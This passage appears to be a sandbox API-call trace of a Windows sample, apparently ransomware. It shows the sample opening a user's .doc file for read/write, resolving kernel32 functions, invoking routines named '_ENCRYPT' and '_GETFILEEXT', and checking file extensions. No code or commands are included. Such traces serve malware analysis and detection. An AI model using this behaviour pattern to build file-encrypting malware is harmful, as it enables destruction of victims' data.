lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.189] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\463pkp6oz8wle1r.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=116, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 116 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe8) returned 0x7c75e8 [0034.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=116, lpWideCharStr=0x7c75e8, cchWideChar=116 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc") returned 116 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.189] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75e8 | out: hHeap=0x770000) returned 1 [0034.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.191] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.192] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0034.192] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.193] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.194] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb08 [0034.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cb08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.194] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0034.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.194] CloseHandle (hObject=0x140) returned 1 [0034.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0034.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0034.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.195] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.195] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.195] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.196] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.196] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.196] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.196] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.196] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.196] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.196] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.196] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.196] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5b7af0, ftCreationTime.dwHighDateTime=0x1d5bcb5, ftLastAccessTime.dwLowDateTime=0x4645edc0, ftLastAccessTime.dwHighDateTime=0x1d5bb0b, ftLastWriteTime.dwLowDateTime=0x4645edc0, ftLastWriteTime.dwHighDateTime=0x1d5bb0b, nFileSizeHigh=0x0, nFileSizeLow=0x3c34, dwReserved0=0x0, dwReserved1=0x777648, cFileName="463pkp6oz8WLE1r.doc", cAlternateFileName="463PKP~1.DOC")) returned 0x7c20c0 [0034.196] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.196] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.196] 